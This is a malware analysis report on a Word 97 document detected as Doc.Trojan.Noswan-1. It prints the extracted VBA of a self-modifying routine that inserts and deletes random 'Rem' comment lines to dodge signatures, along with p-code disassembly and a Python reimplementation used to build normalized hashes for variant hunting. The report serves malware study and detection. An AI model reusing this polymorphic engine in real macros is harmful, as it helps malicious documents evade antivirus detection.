Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bb90784d7110ef44…

MALICIOUS

Office (OLE)

Size: 43.5 KB
Created: 1999-06-11 17:13:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 70d2c945e2fc7c0df728647535f2ec34
SHA-1: 6acea88e4de76b1e31780bd6604a3c07fa4a1d19
SHA-256: bb90784d7110ef448a5f9e0714605513c4738b2f66b37a31891014944bc0cb94
Risk score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Word document (authoring application Microsoft Word 8.0) containing VBA macros. The extracted SOPS module holds a single routine, SomeOtherPolymorphicSystem, that rewrites its own module through the VBE extensibility object model (Application.VBE.ActiveVBProject.VBComponents("SOPS").CodeModule): when the module has more than 65 lines it deletes every line starting with "Rem"; otherwise it inserts up to nine "Rem" lines of random letters at random positions. Only comment lines change between mutations, so the executable statements, and any signature written on them, are unaffected; this is consistent with the extracted macros.bas itself being detected by ClamAV as Win.Tool.W97M-7 while the container is detected as Doc.Trojan.Noswan-1. Two caveats matter for triage: the rewrite only works when Office's "Trust access to the VBA project object model" setting is enabled (otherwise the On Error Resume Next turns the routine into a silent no-op), and the extracted source shows no auto-execution entry point, no URL and no embedded payload. The visible code therefore does not itself download or drop anything. Whether the sample is a self-contained polymorphism demonstrator or one stage of a larger attack cannot be established from static analysis alone, and family attribution is low confidence.
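As an added example, not part of this report's tooling or of the sample, the following Python models the Rem-line mutation described above and shows the two checks a practitioner would run on the extracted macros.bas: flag the VBE object-model identifiers the engine depends on, and hash the source with Rem lines stripped so that every mutation of the same module maps to one digest. The function names, the threshold parameter and the constructed VBA snippet are this example's own; the Rem matcher is deliberately broader than the sample's case-sensitive Left(line, 3) = "Rem" test.

```python
import hashlib
import random
import re

# VBE extensibility identifiers the SOPS routine uses to rewrite its own
# module. They only work when Office's "Trust access to the VBA project
# object model" setting is enabled and are rare in benign documents, so
# their presence in extracted macro source is a triage flag on its own.
VBE_SELF_MOD = re.compile(
    r"\b(Application\.VBE|ActiveVBProject|VBComponents|CodeModule|"
    r"CountOfLines|InsertLines|DeleteLines)\b", re.IGNORECASE)

# A VBA Rem comment line. The sample only tests Left(line, 3) = "Rem",
# case-sensitively and at column 1; this matcher is deliberately broader.
REM_LINE = re.compile(r"^\s*Rem(\s|$)", re.IGNORECASE)

# Constructed stand-in for an extracted module, mirroring the sample's
# key statements (this is not the real macros.bas).
SAMPLE_VBA = """Attribute VB_Name = "SOPS"
Sub SomeOtherPolymorphicSystem()
On Error Resume Next
Rem a pre-existing comment the deletion branch would remove
ActiveLines = Application.VBE.ActiveVBProject.VBComponents("SOPS").CodeModule.CountOfLines
If ActiveLines > 65 Then
    With Application.VBE.ActiveVBProject.VBComponents("SOPS").CodeModule
        For TheLine = 1 To .CountOfLines
            If Left(.Lines(TheLine, 1), 3) = "Rem" Then .DeleteLines TheLine
        Next TheLine
    End With
End If
End Sub
"""


def vbe_indicators(src):
    """Distinct VBE object-model identifiers present in the macro source."""
    return sorted({m.group(1) for m in VBE_SELF_MOD.finditer(src)}, key=str.lower)


def rem_line_count(src):
    return sum(1 for line in src.splitlines() if REM_LINE.match(line))


def normalize(src):
    """Drop Rem and blank lines and collapse whitespace: the part of the
    module the polymorphic engine never touches."""
    kept = []
    for line in src.splitlines():
        if REM_LINE.match(line):
            continue
        line = " ".join(line.split())
        if line:
            kept.append(line)
    return "\n".join(kept)


def raw_sha256(src):
    return hashlib.sha256(src.encode()).hexdigest()


def normalized_sha256(src):
    return hashlib.sha256(normalize(src).encode()).hexdigest()


def sops_mutate(src, seed=None, threshold=65):
    """Re-implementation of both branches of SomeOtherPolymorphicSystem.

    More than `threshold` lines: delete every Rem line. (The sample iterates
    forward while deleting, so it can skip adjacent Rem lines and read past
    the end under On Error Resume Next; the intent is reproduced, not that bug.)
    Otherwise: insert Int(Rnd*10) lines of "Rem " followed by 1..39 pairs of
    Chr(65 + Int(Rnd*22)) & Chr(122 - Int(Rnd*22)) at random positions.
    Returns (new_source, lines_inserted).
    """
    rng = random.Random(seed)
    lines = src.splitlines()
    if len(lines) > threshold:
        return "\n".join(l for l in lines if not REM_LINE.match(l)), 0
    inserted = rng.randrange(10)
    for _ in range(inserted):
        pairs = rng.randrange(39) + 1
        junk = "".join(chr(65 + rng.randrange(22)) + chr(122 - rng.randrange(22))
                       for _ in range(pairs))
        lines.insert(rng.randrange(len(lines) + 1), "Rem " + junk)
    return "\n".join(lines), inserted


def triage(src):
    """Summary a pipeline could attach to an extracted macros.bas."""
    return {
        "vbe_self_modification": vbe_indicators(src),
        "rem_lines": rem_line_count(src),
        "raw_sha256": raw_sha256(src),
        "normalized_sha256": normalized_sha256(src),
    }


if __name__ == "__main__":
    variant, inserted = sops_mutate(SAMPLE_VBA, seed=1)
    for label, module in (("original", SAMPLE_VBA), ("variant", variant)):
        print(label, triage(module))
    # Raw digests differ whenever lines were inserted; normalized ones never do.
    print("inserted:", inserted, "normalized match:",
          normalized_sha256(SAMPLE_VBA) == normalized_sha256(variant))
```

Running the block prints the triage summary for the constructed module and for one mutated variant: the raw SHA-256 changes whenever lines were inserted while the normalized digest stays identical. Computed over the real macros.bas, that normalized digest is the value to pivot on when hunting variants, since the container-level SHA-256 in the header above changes with every mutation-and-save cycle.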

Heuristics (2)

  • ClamAV: Doc.Trojan.Noswan-1 (severity: critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Noswan-1
  • VBA macros detected (severity: medium, OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  4312 bytes
SHA-256: c77766fb2b1c431ebf18ed02d0b003296ccf06b7f368b48d13835acadc0c65f9
Detection
ClamAV: Win.Tool.W97M-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "SOPS"
Sub SomeOtherPolymorphicSystem()
On Error Resume Next

Randomize

ActiveLines = Application.VBE.ActiveVBProject.VBComponents("SOPS").CodeModule.CountOfLines

If ActiveLines > 65 Then
    
    With Application.VBE.ActiveVBProject.VBComponents("SOPS").CodeModule
    
        For TheLine = 1 To .CountOfLines
            If Left(.Lines(TheLine, 1), 3) = "Rem" Then .DeleteLines TheLine
        Next TheLine
    
    End With
    
Else
    
    With Application.VBE.ActiveVBProject.VBComponents("SOPS").CodeModule
    
        PolySize = Int(Rnd * 10)
    
        For PolyMorphic = 1 To PolySize
            
            PolyString = ""
            PolyLines = .CountOfLines
            
            RndLine = Int(Rnd * PolyLines)
            StringSize = Int(Rnd * 39) + 1
            
                For SomeString = 1 To StringSize
                    PolyString = PolyString & Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22))
                Next SomeString
            
            .InsertLines RndLine, "Rem " & PolyString
        
        Next PolyMorphic

    End With

End If

End Sub

' Processing file: /opt/analyzer/scan_staging/30ad7a00cd2c4669a43a5572d0b7f092.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1351 bytes
' Macros/VBA/SOPS - 15921 bytes
' Line #0:
' 	FuncDefn (Sub SomeOtherPolymorphicSystem())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' Line #3:
' 	ArgsCall Read 0x0000 
' Line #4:
' Line #5:
' 	LitStr 0x0004 "SOPS"
' 	Ld Application 
' 	MemLd VBE 
' 	MemLd ActiveVBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	St ActiveLines 
' Line #6:
' Line #7:
' 	Ld ActiveLines 
' 	LitDI2 0x0041 
' 	Gt 
' 	IfBlock 
' Line #8:
' Line #9:
' 	StartWithExpr 
' 	LitStr 0x0004 "SOPS"
' 	Ld Application 
' 	MemLd VBE 
' 	MemLd ActiveVBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	With 
' Line #10:
' Line #11:
' 	StartForVariable 
' 	Ld TheLine 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	MemLdWith CountOfLines 
' 	For 
' Line #12:
' 	Ld TheLine 
' 	LitDI2 0x0001 
' 	ArgsMemLdWith Lines 0x0002 
' 	LitDI2 0x0003 
' 	ArgsLd LBound 0x0002 
' 	LitStr 0x0003 "Rem"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	Ld TheLine 
' 	ArgsMemCallWith DeleteLines 0x0001 
' 	EndIf 
' Line #13:
' 	StartForVariable 
' 	Ld TheLine 
' 	EndForVariable 
' 	NextVar 
' Line #14:
' Line #15:
' 	EndWith 
' Line #16:
' Line #17:
' 	ElseBlock 
' Line #18:
' Line #19:
' 	StartWithExpr 
' 	LitStr 0x0004 "SOPS"
' 	Ld Application 
' 	MemLd VBE 
' 	MemLd ActiveVBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	With 
' Line #20:
' Line #21:
' 	Ld Rnd 
' 	LitDI2 0x000A 
' 	Mul 
' 	FnInt 
' 	St PolySize 
' Line #22:
' Line #23:
' 	StartForVariable 
' 	Ld PolyMorphic 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld PolySize 
' 	For 
' Line #24:
' Line #25:
' 	LitStr 0x0000 ""
' 	St PolyString 
' Line #26:
' 	MemLdWith CountOfLines 
' 	St PolyLines 
' Line #27:
' Line #28:
' 	Ld Rnd 
' 	Ld PolyLines 
' 	Mul 
' 	FnInt 
' 	St RndLine 
' Line #29:
' 	Ld Rnd 
' 	LitDI2 0x0027 
' 	Mul 
' 	FnInt 
' 	LitDI2 0x0001 
' 	Add 
' 	St StringSize 
' Line #30:
' Line #31:
' 	StartForVariable 
' 	Ld SomeString 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld StringSize 
' 	For 
' Line #32:
' 	Ld PolyString 
' 	LitDI2 0x0041 
' 	Ld Rnd 
' 	LitDI2 0x0016 
' 	Mul 
' 	FnInt 
' 	Add 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitDI2 0x007A 
' 	Ld Rnd 
' 	LitDI2 0x0016 
' 	Mul 
' 	FnInt 
' 	Sub 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St PolyString 
' Line #33:
' 	StartForVariable 
' 	Ld SomeString 
' 	EndForVariable 
' 	NextVar 
' Line #34:
' Line #35:
' 	Ld RndLine 
' 	LitStr 0x0004 "Rem "
' 	Ld PolyString 
' 	Concat 
' 	ArgsMemCallWith InsertLine
... (truncated)